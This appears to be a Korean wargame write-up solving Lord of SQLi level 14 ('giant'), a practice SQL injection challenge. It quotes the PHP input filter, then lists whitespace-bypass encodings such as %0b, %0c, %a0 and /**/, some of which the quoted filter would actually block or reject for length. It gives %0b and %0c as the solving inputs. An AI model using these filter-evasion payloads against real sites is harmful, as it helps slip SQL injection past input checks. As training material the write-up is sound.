[LOS] Giant 풀이(14)

14번째 문제인 " giant "입니다.

 

 if(strlen($_GET[shit])>1) exit("No Hack ~_~"); 
 if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe"); 

이번에는 id 나 pw 변수가 아닌 shit 이라는변수를 사용해야 되며 입력되는 값의 길이는 1보다 길면 " No Hack " 이라는 문구를 띄우고 있습니다.

또한 |\n|\r|\t/ 등 여러 공백 우회 기법을 차단하고 있기에 허용가능한 공백 구문을 찾아야 합니다.

 

$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
if($result[1234]) solve("giant");

문제를 해결하기위해선 결괏값에 1234 가 출력되야하는데 쿼리문에 이미 " 1234 " 가 존재합니다.?? 
문제가 조금 특이하다 생각해서 이걸 어쩌라는 건지 생각했는데 위의 query 구문을 보면 from(공백필요).prob 가 붙어 있기 때문에 사이를 띄워주는 것이 목표인 것 같습니다.

 

사용 가능한 공백 기호를 하나씩 대입해보면 성공 가능한 구문이 몇 가지 존재하기에 성공적으로 스테이지를 통과하게 됩니다.

 

공백 우회

shit=() 
shit=%0d (캐리지리턴(\r))
shit=/**/ (다중주석)
shit=%09 (TAB)
shit=%0a (Line Feed(\n))
shit=%0b (vertical tab)
shit=%a0 
shit=%0c (new page) 
shit=%2b(+)
shit=%20

Exploit Code

shit=%0b

shit=%0c